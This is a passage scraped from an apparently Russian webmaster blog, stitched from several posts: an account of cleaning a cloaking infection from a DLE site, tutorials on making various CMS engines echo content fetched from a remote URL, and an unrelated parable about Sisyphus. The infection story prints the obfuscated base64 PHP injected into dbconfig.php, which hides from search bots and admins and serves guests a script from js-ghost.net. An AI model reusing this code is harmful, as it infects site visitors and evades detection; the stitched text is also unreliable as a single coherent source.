Вот и сегодня приключился казус. Просыпаюсь как обычно утром, часов эдак в 2. Завтракаю и захожу в панель вебмастера от Яндекса, чтобы глянуть на сайты. Параллельно вижу по статистике посещаемости, что трафик на одном из сайтов идет на уровне “-500″, по сравнению с прошлым днем. Тревожный звонок, ага.  Это как тёща, которая звонит и говорит, что все дела по дому у себя сделала и думает чем бы ей заняться. Припрётся, точно.  Итак, захожу в панель – и вижу напротив сайта значок, похожий на знак радиационной угрозы, только красный. Такой меткой  Яндекс помечает сайты, зараженные вирусом, а в выдаче мы можем наблюдать “Этот сайт может нанести вред вашему компьютеру”.

Я почти не удивился, DLE  же. Полез искать заразу. Так как я был залогинен админом на сайте, то исходный код был чистым. Вирус не показывался тем, кто заходит под своим аккаунтом на сайт. Зато для гостей был виден кусок кода, сразу перед html.  Выглядит оно так:

<script language=”JavaScript” charset=”windows-1251″ rel=”nofollow” src=”http://js-ghost.net/gate.php?id=666″></script>

Начал искать в шаблонах этот код – нету. Перерыл все файлы на сервере, дата изменения которых была относительно свежей. Хрен там. Часа 2 потратил на то, чтобы найти информацию по этой строчке. Яша и гугл почти ничего не сказали. Только локальные случаи, на которых никто не мог найти решения. Слил весь сайт себе на жесткий, стал искать разные варианты адреса – тоже хрен. Глупо было надеятся, что этот код будет лежать в файле в открытом виде. Было бы слишком просто.

Потом начал искать общую инфу по вирусам в dle и смотреть, куда они обычно прописывают себя. И, алиллуйя, добрался до файла engine/data/dbconfig.php (конфигурационный файл базы данных), где в конце был вписан код:

$GLOBALS['_gro_']=Array(base64_decode(‘cHJlZ19tYXR’ .’ja’ .’A==’),base64_decode(‘cHJl’ .’Z19tYXRj’ .’aA=’ .’='),base64_decode(‘cHJlZ19′ .’tY’ .’XRjaA==’)); ?><? function gro($i){$a=Array(‘ZGxlX3Bhc3N3b3Jk’,'L3lhbmRleC9p’,'SFRUUF9VU0VSX0FHRU5U’,'L2dvb2dsZS9p’,'SFRUUF9
VU0VSX0FHRU5U’,'L2JvdC9p’,'SFRUUF9VU0VSX0FHRU5U’,'PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNj
cmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly9qcy1naG
9zdC5uZXQvZ2F0ZS5waHA/aWQ9NjY2Ij48L3NjcmlwdD4=’);return base64_decode($a[$i]);} ?><? if((!isset($_COOKIE[gro(0)]))and(!$GLOBALS['_gro_'][0](gro(1),$_SERVER[gro(2)]))and(!$GLOBALS['_gro_'][1](gro(3),$_SERVER[gro(4)]))and(!$GLOBALS['_gro_'][2](gro(5),$_SERVER[gro(6)]))){echo gro(7);}

Эта зараза как раз и давала такой эффект. Причем дата изменения файла была древней и поэтому я не обращал на это внимания. Позже в админке обнаружился второй админ, который появился на сайте неделю назад. Удалил его и переименовал файл admin.php, чтобы ворота у сайта не были так явно открыты.

Можно было обновить версию движка (у меня стоит 8.3), но было влом, поэтому потратил куеву тучу времени на поиск этой заразы.  Надеюсь, я не один такой раздолбай с дыркой в dle и эта инфа пригодится еще кому-нибудь (: трулала…

Итак, поскакали.

4. Kandidat CMS.

Вообще, имхо, эта цмска одна из лучших, на которой можно создавать мелкие сайты-сателлиты. На официальном сайте можно нарыть штук 50 шаблонов и построить свою небольшую сеточку, в которой каждый сайт будет, как минимум, с уникальным дизайном. Когда я выбирал cms без баз данных, на которой можно за 5 минут развернуть сайт, то я перепробовал штук 6 разных движков. Все они оказались полным фуфлом. То одно не работает, то другое.

А потом я вышел на Kandidat cms и просто таки написал на ковер, потому что в ней есть все те минимальные функции, которые нужны для построения простенького сайта. Там даже есть мой любимый визуальный редактор, как в вордпрессе (:

И, что самое главное, в самом движке уже предусмотрена возможность вставки удаленного кода. Среди прочих, в каталогах cms есть папка mycode, куда мы и кидаем наш заготовленный файл, например, get.php с уже известным содержанием:

<?php $a=file_get_contents (‘http://адрес файла.ру/пример.html”);  echo $a; ?>

Ну а потом, при создании страницы, чуть ниже будет опция, где мы и прописываем наш get. Выглядит так:

На этом все манипуляции заканчиваются. Код встает, не пискнув.

5. Drupal

В друпале вообще все легко. Не знаю, может у меня какая-то левая сборка, но там уже при создании страницы можно выбрать формат ввода. Там есть Php code. В этом режиме мы  тупо и вставляем нашу любимую строчку:

<?php $a=file_get_contents (‘http://адрес файла.ру/пример.html”);  echo $a; ?>

Друпал мне показался не таким приветливым как ДЛЕ, но по некоторым аспектам он дает фору на сто очков вперед всем остальным движкам.

6. Slaed CMS

На этом движке можно делать и крупные сайты, как я понял. Но какой-то он неказистый и я не совсем проникся его философией. Но пхп код таки в него впендюрил, ага.  Помогла вот эта статья. В ней автор повествует о том, как создавать блоки. Блоки – это нечто, что похоже на виджеты в WP. Но случай намного запущенее и сложнее.

Заходим в каталог  blocks,  который лежит в корне движка и создаем файл – block-get.php.  Содержание:

<?php
if (!defined(“BLOCK_FILE”)) {
Header(“Location: ../index.php”);
exit;
}
$content=file_get_contents (‘http://адрес файла.ру/пример.html”);
?>

Потом читаем статью о том, как создавать файловый  блок и вешаем его в любом месте сайта. Можно сделать сквозной блок, тогда содержимое удаленного файла будет висеть на всех страницах сайта на slaed cms, а можно оставить показ только на определенной странице (например, на главной, как это сделал я).

До остальных двигов я пока не добрался.  Может никогда и не доберусь, хрен его знает.

Чмоки.

]]> http://max1m.ru/2010/03/remote-code-in-different-engines-2/feed/ 12 http://max1m.ru/2010/03/php-code-in-different-engines/ http://max1m.ru/2010/03/php-code-in-different-engines/#comments Sun, 07 Mar 2010 16:52:33 +0000 Максим http://max1m.ru/?p=1574 Так как на дворе весна, озабоченные коты и приветливое солнышко, то захотелось написать о сексе. Но не о сексе в традиционном его понимании. Девушек, руки и горячие постеры с Меган Фокс оставим в сторонке. Займемся сексом с движками сайтов.  Будем их иметь грязным и изощренным способом, поочередно вставляя то в один, то в другой php код (или любой другой код), который будет инклюдиться (запрашиваться, вставляться) с удаленного сервера. Убил на эту инфу целый вечер, поэтому решил расписать все для потомков.

Покажу на примерах только те движки, с которыми работал я, и на которых у меня есть сайты.  Начнем.

1. Ucoz (укоз)

Здесь все банально и просто до невозможности. Благо эта CMS сама расставляет перед нами свои прелестные ножки, чтобы поглубже войти в нее. Заходим внутрь, в панель управления, далее в Дизайн -> Импорт удаленного кода. Здесь тупо прописываем адрес нашего файлика и выставляем частоту обновления кэша в 5 часов.  Система выдаст код, что-то вроде $RCODE_1$, который и можно будет пихать абсолютно на любую страницу сайта.

2. Wordpress

Просто так вставить банальный php код в пост или страницу не получится. Нужно заюзать плагин, который сможет интерпретировать то, что вы будете пихать в <?php …. ?>. Такой плагин есть и, о май гад, он даже работает! Идем сюда и скачиваем плагинчик.  Стандартно устанавливаем и идем создавать страницу, на которую будем икнлюдить содержимое удаленного файла.

Мои познания в php минимальны, но я знаю как получить содержимое файла, этого мне хватило, чтобы удаленный код отображался на вновь созданной странице вордпресса. Выглядит запрос примерно так:

<?php $a=file_get_contents (‘http://адрес файла.ру/пример.html”);  echo $a; ?>

Сначала через file_get_contents считываем файл,  потом через echo выводим его на страницу. Все прекрасно работает.

3. DLE

С ДЛЕ задача несколько усложнилась. У него нет модулей, которые бы позволяли тупо вставлять php код в страницы, поэтому здесь идём через шаблоны, так как при создании любой новой страницы или новости ДЛЕ позволяет выбрать для неё шаблон. Например, возьмем static.tpl, который является шаблоном статической страницы и лежит в папке templates\ваш_дизайн.

Копируем его содержимое и создаем файл static2.tpl.  Внутри будет переменная {static}, которая и отвечаем за контент на странице.  Вот рядом с ней\под ней\над ней и нужно вставлять наш include.

Это будет выглядеть вроде: {static}<br>{include file=”engine/modules/get.php”}

{include file=”engine/modules/get.php”} – это, как видно, не пхп. Здесь мы инклюдим файл, который лежит в engine/modules (это у меня так, а на самом деле можно класть куда душе угодно). Что внутри файла get.php?  Для тех, кто еще не вкурил, поясняю. Там опять одна единственная строчка – <?php $a=file_get_contents (‘http://адрес файла.ру/пример.html”);  echo $a; ?>. Вот он, родимый php, который и забирает файл с удаленного сервака.

Ну а при создании новой статической страницы просто выбираем в нужном месте шаблон static2.tpl.

Еще будет 3 сms, о которых в следующем посте, а то здесь и так куча мало кому понятных сведений (:

P.S. Первый сайт – на английском, под буржунет. Два других – наш трафик. Вчерашний результат. На втором сайте (где 18 кликов) трафа больше, чем на первом в 40 раз, но тематика одна и та же (:

Сизиф безуспешно катил и катил свой камень к вершине горы …
Видя напрасные усилия Сизифа, один из мудрецов заметил:
—Да, — каждый в своей жизни всегда совершает Личный Выбор: делать то, что хочешь, или делать то, чего не хочешь… Этот человек выбрал второе.
Другой мудрец высказал предположение:
—Его заставили заниматься этим обстоятельства, и поэтому выбора у него не было.
Первый мудрец ответил:
—У него был Выбор — он мог или подчиниться обстоятельствам, — или нет. Другой мудрец возразил:
—Но, если бы он не подчинился, его бы за это могли наказать.

Первый мудрец спросил:
—А, …разве, следуя чужой воле, он наказан не более ужасно, — чем если бы он не подчинился ?…

Услышав этот разговор, Сизиф обратился к мудрецам:
—Это вы обо мне напрасно так… Да, моя жизнь тяжела и, даже невыносима. Но, я ею доволен…
Потому, что я знаю: …если не можешь изменить обстоятельства, — измени своё отношение к ним, …и …радуйся …тому, …что тебе назначено судьбой… Это и есть — мой Выбор …

И Сизиф вновь дотащил свой камень до вершины горы, и его камень, с грохотом сорвавшись, вновь полетел вниз.

Первый мудрец ответил Сизифу:
—Кто тебя научил так думать и кто тебе такое сказал …?
И почему ты бездумно следуешь всему тому, что узнаёшь …?
Неужели ты не понимаешь, что взгромоздить свой камень на вершину ты не сможешь !?
Зачем ты продолжаешь и продолжаешь это своё совершенно бесполезное и бессмысленное занятие ?…

И, вновь спустившись к подножию горы, Сизиф вновь поднял свой камень, и вновь покатил его в гору, — сказав мудрецу:
—Это — Моя Судьба… Это — мой Выбор …

Мудрец поинтересовался:
—Сизиф, хочешь, я расскажу тебе, — что нужно сделать, чтобы камень сам закатился на гору?

Сизиф изумился:
—Камень?!.. Сам?!.. Неужели такое возможно?!…

..После того, как мудрец сообщил Сизифу, что и как следует сделать, Сизиф задумался, оценивающе посмотрел вначале на камень, затем взглянул на вершину… и воскликнул:
—А это идея!..

Помчавшись к вершине горы, и, взобравшись на неё, Сизиф опустился на корточки и быстро заработал руками.
Земля из-под его рук разлеталась с огромной скоростью в разные стороны.
Сумев вырыть у самой вершины горы яму, Сизиф вновь спустился вниз, за своим камнем, и вновь потащил его наверх. Докатив свой камень до вырытой им ямы,
он взгромоздил этот огромный камень в яму, и его камень остановился.. Сизиф сбросил с вершины лишнюю землю, и этот камень сам закатился на вершину горы.

Сизиф остался доволен тем, что …сумел воплотить и этот совет:
—Мне это удалось!.. У меня это получилось!.. Я сумел это сделать!.. Спасибо тебе за совет, мудрец. — Я теперь знаю, как закатывать камень на вершину горы!..

… И, …после этого, ….Сизиф …вновь …сбросил свой камень вниз, ….вновь спустился, …и, …как обычно, ….вновь покатил свой камень наверх ….

Мудрецы ещё долго смотрели вслед Сизифу..

И второй мудрец изрёк:
—Да, это точно — каждый в своей жизни всегда совершает Личный Выбор.